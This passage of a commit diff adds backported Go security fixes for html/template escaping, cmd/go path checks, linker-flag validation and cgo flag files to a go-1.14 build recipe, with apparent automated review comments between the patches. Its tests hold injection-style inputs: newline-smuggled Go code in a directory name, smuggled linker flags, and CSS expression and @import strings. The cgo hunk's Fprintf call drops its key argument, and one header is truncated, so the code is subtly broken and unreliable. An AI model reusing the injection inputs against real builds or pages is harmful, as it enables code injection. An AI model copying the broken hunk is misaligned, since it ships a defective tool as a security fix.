+ c.state, c.jsCtx = stateJSSqStr, jsCtxRegexp
++ case '`':
++ c.state, c.jsCtx = stateJSBqStr, jsCtxRegexp
+ case '/':
+ switch {
+ case i+1 < len(s) && s[i+1] == '/':
+@@ -303,6 +306,8 @@ func tJSDelimited(c context, s []byte) (context, int) {
+ switch c.state {
+ case stateJSSqStr:
+ specials = `\'`
++ case stateJSBqStr:
++ specials = "`\\"
+ case stateJSRegexp:
+ specials = `\/[]`
+ }
+--
+2.7.4
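Review bot: In the escape.go hunk, the `stateJSBqStr` branch of escapeAction falls back to `_html_template_jsstrescaper` when `GODEBUG=jstmpllitinterp=1` is set, and the js.go hunks in this patch add only the backtick to the two replacement tables. As far as these hunks show, `${...}` interpolation syntax is therefore not neutralised on the opt-out path. Because the switch is read from the process environment, a deployment that sets it gives up the protection without any visible change to the templates. I would say so at the branch, e.g. `// jstmpllitinterp=1 restores the pre-fix behaviour: the backtick delimiter is escaped but ${} interpolation is not; do not set in production.` Separately, `internal/godebug` is imported here but not added by any hunk in this patch, so for the go-1.14 tree it presumably has to come from an earlier patch in the series; escapeAction's body continues outside the hunk.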
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24539.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24539.patch
new file mode 100644
index 0000000000..281b6486a8
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24539.patch
@@ -0,0 +1,60 @@
+From 8673ca81e5340b87709db2d9749c92a3bf925df1 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Thu, 13 Apr 2023 15:40:44 -0700
+Subject: [PATCH] html/template: disallow angle brackets in CSS values
+
+Angle brackets should not appear in CSS contexts, as they may affect
+token boundaries (such as closing a <style> tag, resulting in
+injection). Instead emit filterFailsafe, matching the behavior for other
+dangerous characters.
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Fixes #59720
+Fixes CVE-2023-24539
+
+Change-Id: Iccc659c9a18415992b0c05c178792228e3a7bae4
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1826636
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/491615
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Run-TryBot: Carlos Amedee <carlos@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport from [https://github.com/golang/go/commit/8673ca81e5340b87709db2d9749c92a3bf925df1]
+CVE: CVE-2023-24539
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+---
+ src/html/template/css.go | 2 +-
+ src/html/template/css_test.go | 2 ++
+ 2 files changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/src/html/template/css.go b/src/html/template/css.go
+index 890a0c6b227fe..f650d8b3e843a 100644
+--- a/src/html/template/css.go
++++ b/src/html/template/css.go
+@@ -238,7 +238,7 @@ func cssValueFilter(args ...any) string {
+ // inside a string that might embed JavaScript source.
+ for i, c := range b {
+ switch c {
+- case 0, '"', '\'', '(', ')', '/', ';', '@', '[', '\\', ']', '`', '{', '}':
++ case 0, '"', '\'', '(', ')', '/', ';', '@', '[', '\\', ']', '`', '{', '}', '<', '>':
+ return filterFailsafe
+ case '-':
+ // Disallow <!-- or -->.
+diff --git a/src/html/template/css_test.go b/src/html/template/css_test.go
+index a735638b0314f..2b76256a766e9 100644
+--- a/src/html/template/css_test.go
++++ b/src/html/template/css_test.go
+@@ -231,6 +231,8 @@ func TestCSSValueFilter(t *testing.T) {
+ {`-exp\000052 ession(alert(1337))`, "ZgotmplZ"},
+ {`-expre\0000073sion`, "-expre\x073sion"},
+ {`@import url evil.css`, "ZgotmplZ"},
++ {"<", "ZgotmplZ"},
++ {">", "ZgotmplZ"},
+ }
+ for _, test := range tests {
+ got := cssValueFilter(test.css)
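Review bot: The css_test.go hunk pins the new `'<'` and `'>'` cases of cssValueFilter only with bare one-character values, so nothing covers a bracket inside a longer value or one that arrives CSS-escaped. Assuming the loop in the css.go hunk runs over the decoded bytes (the existing `-exp\000052 ession(...)` row suggests it does), I would add rows such as `{"a<b", "ZgotmplZ"},` and `{"\\3c ", "ZgotmplZ"},`. The `@@` context line shows `args ...any`, which a go-1.14 tree would spell `...interface{}`, so the hunk was presumably lifted unchanged from a newer branch and is worth confirming to apply without fuzz. cssValueFilter's body and the test loop both continue outside the hunks.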
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24540.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24540.patch
new file mode 100644
index 0000000000..799a0dfcda
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24540.patch
@@ -0,0 +1,90 @@
+From ce7bd33345416e6d8cac901792060591cafc2797 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Tue, 11 Apr 2023 16:27:43 +0100
+Subject: [PATCH] [release-branch.go1.19] html/template: handle all JS
+ whitespace characters
+
+Rather than just a small set. Character class as defined by \s [0].
+
+Thanks to Juho Nurminen of Mattermost for reporting this.
+
+For #59721
+Fixes #59813
+Fixes CVE-2023-24540
+
+[0] https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions/Character_Classes
+
+Change-Id: I56d4fa1ef08125b417106ee7dbfb5b0923b901ba
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1821459
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1851497
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/491355
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+TryBot-Bypass: Carlos Amedee <carlos@golang.org>
+Run-TryBot: Carlos Amedee <carlos@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/ce7bd33345416e6d8cac901792060591cafc2797]
+CVE: CVE-2023-24540
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/html/template/js.go | 8 +++++++-
+ src/html/template/js_test.go | 11 +++++++----
+ 2 files changed, 14 insertions(+), 5 deletions(-)
+
+diff --git a/src/html/template/js.go b/src/html/template/js.go
+index fe7054efe5cd8..4e05c1455723f 100644
+--- a/src/html/template/js.go
++++ b/src/html/template/js.go
+@@ -13,6 +13,11 @@ import (
+ "unicode/utf8"
+ )
+
++// jsWhitespace contains all of the JS whitespace characters, as defined
++// by the \s character class.
++// See https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_expressions/Character_classes.
++const jsWhitespace = "\f\n\r\t\v\u0020\u00a0\u1680\u2000\u2001\u2002\u2003\u2004\u2005\u2006\u2007\u2008\u2009\u200a\u2028\u2029\u202f\u205f\u3000\ufeff"
++
+ // nextJSCtx returns the context that determines whether a slash after the
+ // given run of tokens starts a regular expression instead of a division
+ // operator: / or /=.
+@@ -26,7 +31,8 @@ import (
+ // JavaScript 2.0 lexical grammar and requires one token of lookbehind:
+ // https://www.mozilla.org/js/language/js20-2000-07/rationale/syntax.html
+ func nextJSCtx(s []byte, preceding jsCtx) jsCtx {
+- s = bytes.TrimRight(s, "\t\n\f\r \u2028\u2029")
++ // Trim all JS whitespace characters
++ s = bytes.TrimRight(s, jsWhitespace)
+ if len(s) == 0 {
+ return preceding
+ }
+diff --git a/src/html/template/js_test.go b/src/html/template/js_test.go
+index e07c695f7a77d..e52180cc113b5 100644
+--- a/src/html/template/js_test.go
++++ b/src/html/template/js_test.go
+@@ -81,14 +81,17 @@ func TestNextJsCtx(t *testing.T) {
+ {jsCtxDivOp, "0"},
+ // Dots that are part of a number are div preceders.
+ {jsCtxDivOp, "0."},
++ // Some JS interpreters treat NBSP as a normal space, so
++ // we must too in order to properly escape things.
++ {jsCtxRegexp, "=\u00A0"},
+ }
+
+ for _, test := range tests {
+- if nextJSCtx([]byte(test.s), jsCtxRegexp) != test.jsCtx {
+- t.Errorf("want %s got %q", test.jsCtx, test.s)
++ if ctx := nextJSCtx([]byte(test.s), jsCtxRegexp); ctx != test.jsCtx {
++ t.Errorf("%q: want %s got %s", test.s, test.jsCtx, ctx)
+ }
+- if nextJSCtx([]byte(test.s), jsCtxDivOp) != test.jsCtx {
+- t.Errorf("want %s got %q", test.jsCtx, test.s)
++ if ctx := nextJSCtx([]byte(test.s), jsCtxDivOp); ctx != test.jsCtx {
++ t.Errorf("%q: want %s got %s", test.s, test.jsCtx, ctx)
+ }
+ }
+
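Review bot: The js_test.go hunk adds a single row, `{jsCtxRegexp, "=\u00A0"}`, while the js.go hunk widens the trimmed set to the whole `jsWhitespace` constant, so a later edit that drops a code point from the constant would go unnoticed. I would derive the cases from the constant itself, looping with `for _, r := range jsWhitespace {` and checking `nextJSCtx([]byte("="+string(r)), jsCtxDivOp) != jsCtxRegexp` inside it. That keeps the test and the constant from drifting apart and exercises the multi-byte entries as well as the ASCII ones. TestNextJsCtx and nextJSCtx both continue outside the hunks.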
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29400.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29400.patch
new file mode 100644
index 0000000000..092c7aa0ff
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29400.patch
@@ -0,0 +1,94 @@
+From 0d347544cbca0f42b160424f6bc2458ebcc7b3fc Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Thu, 13 Apr 2023 14:01:50 -0700
+Subject: [PATCH] html/template: emit filterFailsafe for empty unquoted attr
+ value
+
+An unquoted action used as an attribute value can result in unsafe
+behavior if it is empty, as HTML normalization will result in unexpected
+attributes, and may allow attribute injection. If executing a template
+results in a empty unquoted attribute value, emit filterFailsafe
+instead.
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Fixes #59722
+Fixes CVE-2023-29400
+
+Change-Id: Ia38d1b536ae2b4af5323a6c6d861e3c057c2570a
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1826631
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/491617
+Run-TryBot: Carlos Amedee <carlos@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport from [https://github.com/golang/go/commit/0d347544cbca0f42b160424f6bc2458ebcc7b3fc]
+CVE: CVE-2023-29400
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+---
+ src/html/template/escape.go | 5 ++---
+ src/html/template/escape_test.go | 15 +++++++++++++++
+ src/html/template/html.go | 3 +++
+ 3 files changed, 20 insertions(+), 3 deletions(-)
+
+diff --git a/src/html/template/escape.go b/src/html/template/escape.go
+index 4ba1d6b31897e..a62ef159f0dcd 100644
+--- a/src/html/template/escape.go
++++ b/src/html/template/escape.go
+@@ -382,9 +382,8 @@ func normalizeEscFn(e string) string {
+ // for all x.
+ var redundantFuncs = map[string]map[string]bool{
+ "_html_template_commentescaper": {
+- "_html_template_attrescaper": true,
+- "_html_template_nospaceescaper": true,
+- "_html_template_htmlescaper": true,
++ "_html_template_attrescaper": true,
++ "_html_template_htmlescaper": true,
+ },
+ "_html_template_cssescaper": {
+ "_html_template_attrescaper": true,
+diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
+index 3dd212bac9406..f8b2b448f2dfa 100644
+--- a/src/html/template/escape_test.go
++++ b/src/html/template/escape_test.go
+@@ -678,6 +678,21 @@ func TestEscape(t *testing.T) {
+ `<img srcset={{",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"}}>`,
+ `<img srcset=,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,>`,
+ },
++ {
++ "unquoted empty attribute value (plaintext)",
++ "<p name={{.U}}>",
++ "<p name=ZgotmplZ>",
++ },
++ {
++ "unquoted empty attribute value (url)",
++ "<p href={{.U}}>",
++ "<p href=ZgotmplZ>",
++ },
++ {
++ "quoted empty attribute value",
++ "<p name=\"{{.U}}\">",
++ "<p name=\"\">",
++ },
+ }
+
+ for _, test := range tests {
+diff --git a/src/html/template/html.go b/src/html/template/html.go
+index bcca0b51a0ef9..a181699a5bda8 100644
+--- a/src/html/template/html.go
++++ b/src/html/template/html.go
+@@ -14,6 +14,9 @@ import (
+ // htmlNospaceEscaper escapes for inclusion in unquoted attribute values.
+ func htmlNospaceEscaper(args ...interface{}) string {
+ s, t := stringify(args...)
++ if s == "" {
++ return filterFailsafe
++ }
+ if t == contentTypeHTML {
+ return htmlReplacer(stripTags(s), htmlNospaceNormReplacementTable, false)
+ }
+
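Review bot: The doc comment on `htmlNospaceEscaper` in the html.go hunk still describes only escaping, while the added `if s == ""` branch returns `filterFailsafe` before the content-type check, so an empty value of any type now renders as `ZgotmplZ` (as the new escape_test.go cases show). I would extend the comment, for example `// An empty value is replaced by filterFailsafe, because an empty unquoted attribute value lets HTML normalization change the attribute structure.` The function body continues past the end of the hunk. Separately, the tag here reads `Upstream-Status: Backport from [...]` while the other patches in this commit use `Backport [...]`; one form would keep the tags uniform.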
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29402.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29402.patch
new file mode 100644
index 0000000000..01eed9fe1b
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29402.patch
@@ -0,0 +1,201 @@
+rom c160b49b6d328c86bd76ca2fff9009a71347333f Mon Sep 17 00:00:00 2001
+From: "Bryan C. Mills" <bcmills@google.com>
+Date: Fri, 12 May 2023 14:15:16 -0400
+Subject: [PATCH] [release-branch.go1.19] cmd/go: disallow package directories
+ containing newlines
+
+Directory or file paths containing newlines may cause tools (such as
+cmd/cgo) that emit "//line" or "#line" -directives to write part of
+the path into non-comment lines in generated source code. If those
+lines contain valid Go code, it may be injected into the resulting
+binary.
+
+(Note that Go import paths and file paths within module zip files
+already could not contain newlines.)
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Updates #60167.
+Fixes #60515.
+Fixes CVE-2023-29402.
+
+Change-Id: If55d0400c02beb7a5da5eceac60f1abeac99f064
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1882606
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Russ Cox <rsc@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+(cherry picked from commit 41f9046495564fc728d6f98384ab7276450ac7e2)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1902229
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1904343
+Reviewed-by: Michael Knyszek <mknyszek@google.com>
+Reviewed-by: Bryan Mills <bcmills@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/501218
+Run-TryBot: David Chase <drchase@google.com>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/c160b49b6d328c86bd76ca2fff9009a71347333f]
+CVE: CVE-2023-29402
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/cmd/go/internal/load/pkg.go | 4 +
+ src/cmd/go/internal/work/exec.go | 6 ++
+ src/cmd/go/script_test.go | 1 +
+ .../go/testdata/script/build_cwd_newline.txt | 100 ++++++++++++++++++
+ 4 files changed, 111 insertions(+)
+ create mode 100644 src/cmd/go/testdata/script/build_cwd_newline.txt
+
+diff --git a/src/cmd/go/internal/load/pkg.go b/src/cmd/go/internal/load/pkg.go
+index 369a79b..d2b63b0 100644
+--- a/src/cmd/go/internal/load/pkg.go
++++ b/src/cmd/go/internal/load/pkg.go
+@@ -1697,6 +1697,10 @@ func (p *Package) load(stk *ImportStack, bp *build.Package, err error) {
+ setError(ImportErrorf(p.ImportPath, "invalid import path %q", p.ImportPath))
+ return
+ }
++ if strings.ContainsAny(p.Dir, "\r\n") {
++ setError(fmt.Errorf("invalid package directory %q", p.Dir))
++ return
++ }
+
+ // Build list of imported packages and full dependency list.
+ imports := make([]*Package, 0, len(p.Imports))
+diff --git a/src/cmd/go/internal/work/exec.go b/src/cmd/go/internal/work/exec.go
+index 9a9650b..050b785 100644
+--- a/src/cmd/go/internal/work/exec.go
++++ b/src/cmd/go/internal/work/exec.go
+@@ -458,6 +458,12 @@ func (b *Builder) build(a *Action) (err error) {
+ b.Print(a.Package.ImportPath + "\n")
+ }
+
++ if p.Error != nil {
++ // Don't try to build anything for packages with errors. There may be a
++ // problem with the inputs that makes the package unsafe to build.
++ return p.Error
++ }
++
+ if a.Package.BinaryOnly {
+ p.Stale = true
+ p.StaleReason = "binary-only packages are no longer supported"
+diff --git a/src/cmd/go/script_test.go b/src/cmd/go/script_test.go
+index ec498bb..a1398ad 100644
+--- a/src/cmd/go/script_test.go
++++ b/src/cmd/go/script_test.go
+@@ -123,6 +123,7 @@ func (ts *testScript) setup() {
+ "devnull=" + os.DevNull,
+ "goversion=" + goVersion(ts),
+ ":=" + string(os.PathListSeparator),
++ "newline=\n",
+ }
+
+ if runtime.GOOS == "plan9" {
+diff --git a/src/cmd/go/testdata/script/build_cwd_newline.txt b/src/cmd/go/testdata/script/build_cwd_newline.txt
+new file mode 100644
+index 0000000..61c6966
+--- /dev/null
++++ b/src/cmd/go/testdata/script/build_cwd_newline.txt
+@@ -0,0 +1,100 @@
++[windows] skip 'filesystem normalizes / to \'
++[plan9] skip 'filesystem disallows \n in paths'
++
++# If the directory path containing a package to be built includes a newline,
++# the go command should refuse to even try to build the package.
++
++env DIR=$WORK${/}${newline}'package main'${newline}'func main() { panic("uh-oh")'${newline}'/*'
++
++mkdir $DIR
++cd $DIR
++exec pwd
++cp $WORK/go.mod ./go.mod
++cp $WORK/main.go ./main.go
++cp $WORK/main_test.go ./main_test.go
++
++! go build -o $devnull .
++stderr 'package example: invalid package directory .*uh-oh'
++
++! go build -o $devnull main.go
++stderr 'package command-line-arguments: invalid package directory .*uh-oh'
++
++! go run .
++stderr 'package example: invalid package directory .*uh-oh'
++
++! go run main.go
++stderr 'package command-line-arguments: invalid package directory .*uh-oh'
++
++! go test .
++stderr 'package example: invalid package directory .*uh-oh'
++
++! go test -v main.go main_test.go
++stderr 'package command-line-arguments: invalid package directory .*uh-oh'
++
++
++# Since we do preserve $PWD (or set it appropriately) for commands, and we do
++# not resolve symlinks unnecessarily, referring to the contents of the unsafe
++# directory via a safe symlink should be ok, and should not inject the data from
++# the symlink target path.
++
++[!symlink] stop 'remainder of test checks symlink behavior'
++[short] stop 'links and runs binaries'
++
++symlink $WORK${/}link -> $DIR
++
++go run $WORK${/}link${/}main.go
++! stdout panic
++! stderr panic
++stderr '^ok$'
++
++go test -v $WORK${/}link${/}main.go $WORK${/}link${/}main_test.go
++! stdout panic
++! stderr panic
++stdout '^ok$' # 'go test' combines the test's stdout into stderr
++
++cd $WORK/link
++
++! go run $DIR${/}main.go
++stderr 'package command-line-arguments: invalid package directory .*uh-oh'
++
++go run .
++! stdout panic
++! stderr panic
++stderr '^ok$'
++
++go run main.go
++! stdout panic
++! stderr panic
++stderr '^ok$'
++
++go test -v
++! stdout panic
++! stderr panic
++stdout '^ok$' # 'go test' combines the test's stdout into stderr
++
++go test -v .
++! stdout panic
++! stderr panic
++stdout '^ok$' # 'go test' combines the test's stdout into stderr
++
++
++-- $WORK/go.mod --
++module example
++go 1.19
++-- $WORK/main.go --
++package main
++
++import "C"
++
++func main() {
++ /* nothing here */
++ println("ok")
++}
++-- $WORK/main_test.go --
++package main
++
++import "testing"
++
++func TestMain(*testing.M) {
++ main()
++}
+--
+2.25.1
+
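Review bot: The first line of this patch file reads `rom c160b49b6d328c86bd76ca2fff9009a71347333f Mon Sep 17 00:00:00 2001`; the leading `F` of the mbox `From ` line is missing. Plain `patch` skips header text, so the recipe probably still applies the file, but tools that parse it as a mailbox patch (for example `git am`) are likely to reject it. Restore the line as `From c160b49b6d328c86bd76ca2fff9009a71347333f Mon Sep 17 00:00:00 2001` so the upstream commit id stays machine-readable next to the `Upstream-Status` and `CVE` tags.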
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29404.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29404.patch
new file mode 100644
index 0000000000..61336ee9ee
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29404.patch
@@ -0,0 +1,84 @@
+From bf3c8ce03e175e870763901a3850bca01381a828 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Fri, 5 May 2023 13:10:34 -0700
+Subject: [PATCH] [release-branch.go1.19] cmd/go: enforce flags with
+ non-optional arguments
+
+Enforce that linker flags which expect arguments get them, otherwise it
+may be possible to smuggle unexpected flags through as the linker can
+consume what looks like a flag as an argument to a preceding flag (i.e.
+"-Wl,-O -Wl,-R,-bad-flag" is interpreted as "-O=-R -bad-flag"). Also be
+somewhat more restrictive in the general format of some flags.
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Updates #60305
+Fixes #60511
+Fixes CVE-2023-29404
+
+Change-Id: Icdffef2c0f644da50261cace6f43742783931cff
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1876275
+Reviewed-by: Ian Lance Taylor <iant@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+(cherry picked from commit 896779503cf754cbdac24b61d4cc953b50fe2dde)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1902225
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1904342
+Reviewed-by: Michael Knyszek <mknyszek@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/501217
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+Run-TryBot: David Chase <drchase@google.com>
+TryBot-Bypass: Michael Knyszek <mknyszek@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/bf3c8ce03e175e870763901a3850bca01381a828]
+CVE: CVE-2023-29404
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/cmd/go/internal/work/security.go | 6 +++---
+ src/cmd/go/internal/work/security_test.go | 5 +++++
+ 2 files changed, 8 insertions(+), 3 deletions(-)
+
+diff --git a/src/cmd/go/internal/work/security.go b/src/cmd/go/internal/work/security.go
+index a823b20..8acb6dc 100644
+--- a/src/cmd/go/internal/work/security.go
++++ b/src/cmd/go/internal/work/security.go
+@@ -177,17 +177,17 @@ var validLinkerFlags = []*lazyregexp.Regexp{
+ re(`-Wl,-Bdynamic`),
+ re(`-Wl,-berok`),
+ re(`-Wl,-Bstatic`),
+- re(`-WL,-O([^@,\-][^,]*)?`),
++ re(`-Wl,-O[0-9]+`),
+ re(`-Wl,-d[ny]`),
+ re(`-Wl,--disable-new-dtags`),
+- re(`-Wl,-e[=,][a-zA-Z0-9]*`),
++ re(`-Wl,-e[=,][a-zA-Z0-9]+`),
+ re(`-Wl,--enable-new-dtags`),
+ re(`-Wl,--end-group`),
+ re(`-Wl,--(no-)?export-dynamic`),
+ re(`-Wl,-framework,[^,@\-][^,]+`),
+ re(`-Wl,-headerpad_max_install_names`),
+ re(`-Wl,--no-undefined`),
+- re(`-Wl,-R([^@\-][^,@]*$)`),
++ re(`-Wl,-R,?([^@\-,][^,@]*$)`),
+ re(`-Wl,--just-symbols[=,]([^,@\-][^,@]+)`),
+ re(`-Wl,-rpath(-link)?[=,]([^,@\-][^,]+)`),
+ re(`-Wl,-s`),
+diff --git a/src/cmd/go/internal/work/security_test.go b/src/cmd/go/internal/work/security_test.go
+index bd707ff..7b0b7d3 100644
+--- a/src/cmd/go/internal/work/security_test.go
++++ b/src/cmd/go/internal/work/security_test.go
+@@ -220,6 +220,11 @@ var badLinkerFlags = [][]string{
+ {"-Wl,-R,@foo"},
+ {"-Wl,--just-symbols,@foo"},
+ {"../x.o"},
++ {"-Wl,-R,"},
++ {"-Wl,-O"},
++ {"-Wl,-e="},
++ {"-Wl,-e,"},
++ {"-Wl,-R,-flag"},
+ }
+
+ func TestCheckLinkerFlags(t *testing.T) {
+--
+2.25.1
+
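Review bot: In the security.go hunk the replaced pattern is spelled `-WL,-O([^@,\-][^,]*)?` with a capital `L`, so on this branch it presumably never matched a real `-Wl,-O…` flag; the new `-Wl,-O[0-9]+` therefore newly accepts `-Wl,-O<digits>` rather than narrowing an existing rule. The added `badLinkerFlags` entries cover only rejected forms. I would mention this behaviour change in the patch header and add an accepted case such as `{"-Wl,-O2"}` to the positive flag list in security_test.go, which is outside this hunk, so the allowed form is pinned as well.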
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-1.patch
new file mode 100644
index 0000000000..70d50cc08a
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-1.patch
@@ -0,0 +1,112 @@
+From fa60c381ed06c12f9c27a7b50ca44c5f84f7f0f4 Mon Sep 17 00:00:00 2001
+From: Ian Lance Taylor <iant@golang.org>
+Date: Thu, 4 May 2023 14:06:39 -0700
+Subject: [PATCH] [release-branch.go1.20] cmd/go,cmd/cgo: in _cgo_flags use one
+ line per flag
+
+The flags that we recorded in _cgo_flags did not use any quoting,
+so a flag containing embedded spaces was mishandled.
+Change the _cgo_flags format to put each flag on a separate line.
+That is a simple format that does not require any quoting.
+
+As far as I can tell only cmd/go uses _cgo_flags, and it is only
+used for gccgo. If this patch doesn't cause any trouble, then
+in the next release we can change to only using _cgo_flags for gccgo.
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Updates #60306
+Fixes #60514
+Fixes CVE-2023-29405
+
+Change-Id: I36b6e188a44c80d7b9573efa577c386770bd2ba3
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1875094
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+(cherry picked from commit bcdfcadd5612212089d958bc352a6f6c90742dcc)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1902228
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1904345
+Reviewed-by: Michael Knyszek <mknyszek@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/501220
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: David Chase <drchase@google.com>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+---
+Upstream-Status: Backport [https://github.com/golang/go/commit/fa60c381ed06c12f9c27a7b50ca44c5f84f7f0f4]
+CVE: CVE-2023-29405
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ src/cmd/cgo/out.go | 4 +++-
+ src/cmd/go/internal/work/gccgo.go | 14 ++++++-------
+ .../go/testdata/script/gccgo_link_ldflags.txt | 20 +++++++++++++++++++
+ 3 files changed, 29 insertions(+), 9 deletions(-)
+ create mode 100644 src/cmd/go/testdata/script/gccgo_link_ldflags.txt
+
+diff --git a/src/cmd/cgo/out.go b/src/cmd/cgo/out.go
+index d26f9e76a374a..d0c6fe3d4c2c2 100644
+--- a/src/cmd/cgo/out.go
++++ b/src/cmd/cgo/out.go
+@@ -47,7 +47,9 @@ func (p *Package) writeDefs() {
+
+ fflg := creat(*objDir + "_cgo_flags")
+ for k, v := range p.CgoFlags {
+- fmt.Fprintf(fflg, "_CGO_%s=%s\n", k, strings.Join(v, " "))
++ for _, arg := range v {
++ fmt.Fprintf(fflg, "_CGO_%s=%s\n", arg)
++ }
+ if k == "LDFLAGS" && !*gccgo {
+ for _, arg := range v {
+ fmt.Fprintf(fgo2, "//go:cgo_ldflag %q\n", arg)
+diff --git a/src/cmd/go/internal/work/gccgo.go b/src/cmd/go/internal/work/gccgo.go
+index 08a4c2d8166c7..a048b7f4eecef 100644
+--- a/src/cmd/go/internal/work/gccgo.go
++++ b/src/cmd/go/internal/work/gccgo.go
+@@ -280,14 +280,12 @@ func (tools gccgoToolchain) link(b *Builder, root *Action, out, importcfg string
+ const ldflagsPrefix = "_CGO_LDFLAGS="
+ for _, line := range strings.Split(string(flags), "\n") {
+ if strings.HasPrefix(line, ldflagsPrefix) {
+- newFlags := strings.Fields(line[len(ldflagsPrefix):])
+- for _, flag := range newFlags {
+- // Every _cgo_flags file has -g and -O2 in _CGO_LDFLAGS
+- // but they don't mean anything to the linker so filter
+- // them out.
+- if flag != "-g" && !strings.HasPrefix(flag, "-O") {
+- cgoldflags = append(cgoldflags, flag)
+- }
++ flag := line[len(ldflagsPrefix):]
++ // Every _cgo_flags file has -g and -O2 in _CGO_LDFLAGS
++ // but they don't mean anything to the linker so filter
++ // them out.
++ if flag != "-g" && !strings.HasPrefix(flag, "-O") {
++ cgoldflags = append(cgoldflags, flag)
+ }
+ }
+ }
